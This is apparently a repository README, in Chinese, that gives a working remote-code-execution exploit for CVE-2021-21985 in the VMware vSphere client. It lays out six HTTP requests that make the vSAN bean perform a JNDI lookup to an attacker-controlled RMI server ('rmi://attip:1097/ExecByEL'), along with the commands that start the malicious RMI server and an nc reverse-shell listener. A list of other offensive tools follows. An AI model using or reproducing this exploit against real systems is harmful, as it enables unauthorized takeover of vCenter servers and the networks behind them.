cve-2021-21985 exploit

0x01 漏洞点

分析可见：

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

0x02 exploit

对beans对象进行重新构造，实现rce。

bean列表：

localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService

随风大佬使用的vsanProviderUtils_setVmodlHelper在我这边环境没测试成功，就选用了另外的bean进行测试，由于Vsphere UI使用的tomcat中间件，可以通过jndi rmi bypass(https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java）远程执行命令。

Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}

0x03 使用方法

启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
启动reverse shell 侦听

nc -lvvp 5555

执行以上payload，得到reverse shell

cve-2021-21985 exploit

Related tags

Overview

cve-2021-21985 exploit

0x01 漏洞点

0x02 exploit

0x03 使用方法

0x04 reference

Owner

xnianq

Raphael is a vulnerability scanning tool based on Python3.

CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight;

Tool for finding PHP source code vulnerabilities.

Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077

Yesitsme - Simple OSINT script to find Instagram profiles by name and e-mail/phone

JS Deobfuscation is a Python script that deobfuscate JS code and it's time saver for you.

the swiss army knife in the hash field. fast, reliable and easy to use

FTP-Exploits is a tool made in python that contains 4 diffrent types of ftp exploits that can be used in Penetration Testing.

Um keylogger que se disfarça de um app que tira print da tela.

Security audit Python project dependencies against security advisory databases.

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

Reusable Lightweight Pythonic Dependency Injection Library

Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts.

Automated tool to exploit basic buffer overflow remotely and locally & x32 and x64

Repo for The Crown: Exploratory Analysis of Nim Malware DEF CON 615 talk

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

Scanner for Intranet

Generate obfuscated meterpreter shells

web指纹识别工具

This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data.